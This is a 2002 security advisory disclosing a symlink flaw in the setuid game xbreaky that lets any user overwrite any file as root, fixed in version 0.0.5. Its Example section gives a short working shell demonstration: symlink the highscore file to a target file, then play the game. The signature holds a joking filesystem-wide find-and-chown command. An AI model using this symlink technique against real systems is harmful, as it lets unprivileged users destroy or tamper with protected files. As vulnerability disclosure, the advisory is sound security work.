----------------------------------------------------------------------- Title: xbreaky symlink vulnerability Author: Marco van Berkum Classification: High risk Date: 12/09/2002 Email: m.v.berkum@obit.nl Company: OBIT Company site: http://www.obit.nl Personal website: http://ws.obit.nl ----------------------------------------------------------------------- About xbreaky ------------- xbreaky is a breakout game for X written by Dave Brul which can be downloaded from http://xbreaky.sourceforge.net. xbreaky is added to the OpenBSD ports tree, NetBSD tree and possibly others. Problem ------- By default xbreaky is installed as suid and can be abused to overwrite any file on the filesystem, by any user. Vulnerable versions ------------------- All versions prior to 0.0.5 Exploit ------- xbreaky uses $HOME/.breakyhighscores to write the highscores to, when $HOME/.breakyhighscores is symlinked to another file (*any* file) it simply overwrites it as root user. Example ------- root@animal:/home/marco# echo "bla" >rootfile root@animal:/home/marco# chmod 600 rootfile root@animal:/home/marco# exit logout marco@animal:~$ ln -s rootfile .breakyhighscores marco@animal:~$ xbreaky Now I play a game and set highscore as user "lol", then I exit the game. Its a nice game btw :) marco@animal:~$ cat rootfile cat: rootfile: Permission denied marco@animal:~$ su - Password: root@animal:~# cat /home/marco/rootfile lol <- voila, our highscore user Author's response and solution ------------------------------ The author corrected the problem and released xbreaky 0.0.5 Credits ------- Thanks to Dennis Oelkers for testing. -- find / -user your -name base -exec chown us:us {}\; ---------------------------------------- | Marco van Berkum / MB17300-RIPE | | m.v.berkum@obit.nl / http://ws.obit.nl | ----------------------------------------
